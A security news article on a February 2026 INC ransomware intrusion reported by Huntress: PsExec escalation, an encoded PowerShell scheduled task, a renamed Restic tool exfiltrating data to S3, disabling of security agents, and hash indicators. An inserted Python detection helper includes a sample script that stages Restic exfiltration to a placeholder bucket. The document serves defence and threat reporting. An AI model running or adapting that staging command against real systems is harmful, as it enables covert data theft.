PowerShell and PsExec Used To Steal Data Before INC Ransomware Attack


Cybersecurity researchers at Huntress recently observed threat actors deploying INC ransomware following a sophisticated data exfiltration process.

On February 25, 2026, attackers compromised a customer’s infrastructure, stole sensitive data, and then encrypted the network.

The threat actors used native Windows tools such as PowerShell and PsExec to stage the attack, elevate privileges, and bypass early-detection systems.

Because the targeted organization had an incomplete deployment of security agents and lacked a Security Information and Event Management (SIEM) system, the attackers operated undetected during the initial phases.

Data Exfiltration and Evasion Tactics

The attack sequence began on February 24 when the threat actor accessed the targeted endpoint and mapped a network share.

They quickly launched the Microsoft-provided utility PsExec to elevate their system privileges. Following this, the attackers created a scheduled task named “Recovery Diagnostics” configured to execute a malicious script.

This task launched a base64-encoded PowerShell command that set environment variables pointing at a cloud storage bucket. The attackers used a renamed copy of the legitimate, open-source backup utility Restic, disguised as winupdate.exe to blend in with normal system processes.

The script pointed to an S3 bucket hosted on Wasabi. It included hardcoded credentials, notably leaving the password as the simple word “password.”

A follow-up command instructed the disguised Restic tool to back up specific files listed in a text document, effectively exfiltrating the data to the attacker’s cloud infrastructure.
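As an added example (not from Huntress or the original article), the following Python triage helper decodes the -EncodedCommand argument of a scheduled task's PowerShell action and flags assignments of the Restic and S3 environment variables that this staging step relies on. The task names, file paths, bucket host and key values in the sample records are constructed placeholders, not indicators from the incident.

```python
import base64
import binascii
import re

# Restic reads its repository and credentials from these environment variables;
# an encoded PowerShell block that sets them before running a renamed restic binary
# is the exfiltration staging pattern described above.
RESTIC_ENV_VARS = ("RESTIC_REPOSITORY", "RESTIC_PASSWORD",
                   "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY")
ENCODED_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
ENV_ASSIGN = re.compile(r"\$env:(\w+)\s*=", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the plaintext behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def restic_staging_hits(cmdline):
    """Names of Restic/S3 environment variables assigned in the (decoded) command."""
    script = decode_encoded_command(cmdline) or cmdline
    names = [name.upper() for name in ENV_ASSIGN.findall(script)]
    return [n for n in names if n in RESTIC_ENV_VARS]

def triage_tasks(tasks):
    """(task name, hit list) for every task whose action stages a Restic/S3 repository."""
    return [(t["task"], restic_staging_hits(t["cmd"]))
            for t in tasks if restic_staging_hits(t["cmd"])]

# Constructed sample (placeholder host, key and paths): a task whose action is an
# encoded PowerShell command that configures Restic and runs a renamed copy of it.
SAMPLE_SCRIPT = (
    '$env:RESTIC_REPOSITORY = "s3:s3.example-host.invalid/bucket"; '
    '$env:RESTIC_PASSWORD = "password"; '
    '$env:AWS_ACCESS_KEY_ID = "EXAMPLEKEY"; '
    r'C:\Windows\Temp\winupdate.exe backup --files-from C:\Windows\Temp\list.txt'
)

def to_encoded_command(script):
    """Encode a script the way -EncodedCommand expects (used only to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

SAMPLE_TASKS = [
    {"task": "Recovery Diagnostics", "cmd": "powershell.exe -NoP -enc " + to_encoded_command(SAMPLE_SCRIPT)},
    {"task": "Disk Cleanup", "cmd": "powershell.exe -Command Get-Date"},
]
```

Feed it the action command lines exported from Task Scheduler (or Sysmon/4688 process creation events); a task that sets RESTIC_PASSWORD or AWS keys inline and then runs a binary outside the normal backup software's path deserves immediate review.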

To prepare for the final ransomware deployment, the attackers methodically dismantled the endpoint’s security defenses.

On February 25, they ran an executable to uninstall the VIPRE Business Agent, and it was successfully removed using the standard uninstaller.

They also disabled Windows Defender by turning off Real-Time Protection. With the environment stripped of its security controls, the threat actor launched the INC ransomware executable, disguised as win.exe, which used the Windows Restart Manager API to lock and encrypt files.

Incident Overlap and Attack Indicators

This attack method is not an isolated event, as Huntress analysts documented a nearly identical incident earlier in the month on February 9.

During that intrusion, the same threat actors used matching base64-encoded PowerShell commands to push a Restic configuration for data theft.

The cloud storage access keys and environment variables were identical across both attacks. In the earlier incident, the attackers used a tool called HRSword to turn off Acronis security services. However, rapid response efforts prevented the ransomware deployment.

Further validating this pattern, the Cyber Centaurs team reported remarkably similar activity tied to the INC ransomware infrastructure on January 22, 2026.

The consistent use of renamed backup utilities, hardcoded cloud credentials, and targeted removal of security tools highlights a standardized playbook used by this threat group.

Organizations are urged to monitor their environments for the following indicators of compromise associated with this INC ransomware campaign:

Indicator (SHA256) and description:
1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d - SHA256 hash for C:\123\edr.exe
e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13 - SHA256 hash for c:\perflogs\win.exe
